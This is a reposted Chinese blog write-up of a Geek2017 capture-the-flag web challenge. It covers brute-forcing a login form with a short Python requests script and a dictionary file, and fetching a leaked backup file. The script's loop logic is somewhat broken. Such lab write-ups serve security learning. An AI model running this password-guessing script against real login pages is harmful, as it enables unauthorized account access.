博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
网页表单提交、备份文件泄露
阅读量:4970 次
发布时间:2019-06-12

本文共 813 字,大约阅读时间需要 2 分钟。

怎么又是web?  EXM?? 我一定是个假的二进制手

假装来看看吧

以Geek2017 粗心的李超为例(大佬们,我知道错了,第一次搞忘了规矩了

The first way:弱口令爆破   

 

网页里只有两个输入框,从源码里能找到name

生成字典,去Python里request爆破吧,脚本如下

1 # coding:utf-8 2 import requests 3 import time 4 url='http://game.sycsec.com:2001' 5 f = open("dic.txt","r",encoding="utf-8") 6 # print(len(f.readlines())) 7 for i in range(f.readlines()): 8     psd = f.readline().replace("\n","") 9     p = {
'user': 'admin', 'pass': psd}10 print(p)11 r = requests.post(url, data=p)12 # time.sleep(1)13 print(i)14 if 'SYC' in r.text:15 print(r.text)16 break

注意要把字典中的\n去掉

另外在爆破过程中可能会蜜汁服务器拒绝响应,从上次断开的点重新开始吧

最后经过撕心裂肺的于get啦

 

 The second way:备份文件泄露

 

 直接能下载备份文件啦,果然是粗心的李超呢

 

无限春光,尽收眼底

输进去就好啦

另外某大佬说用burpsuite,emmm等我学会了再来填坑吧

 

作者:
出处:
如有转载,荣幸之至!请随手标明出处;

转载于:https://www.cnblogs.com/ZHijack/p/7672412.html

你可能感兴趣的文章
oozie bundle学习笔记
查看>>
会报编译器警告的Xcode 6.3新特性:Nullability Annotations
查看>>
Django 二
查看>>
Spring框架学习(三):Spring容器
查看>>
node安装包
查看>>
IOS crash分析
查看>>
java基础笔记(8)----接口
查看>>
前端和后端的区别和分工
查看>>
uva 10304
查看>>
bzoj2729 [HNOI2012]排队
查看>>
python 图像处理
查看>>
教你写Makefile(很全,含有工作经验的)
查看>>
bitmap位图法学习
查看>>
swift新特性(__nullable和__nonnull
查看>>
IIS 之 HTTP错误信息提示
查看>>
JQuery几点用法摘记
查看>>
网络编程系列之Winsock
查看>>
c# window服务-初学习
查看>>
一些LUA函数
查看>>
order by/sort by/distribute by /cluster by 的区分
查看>>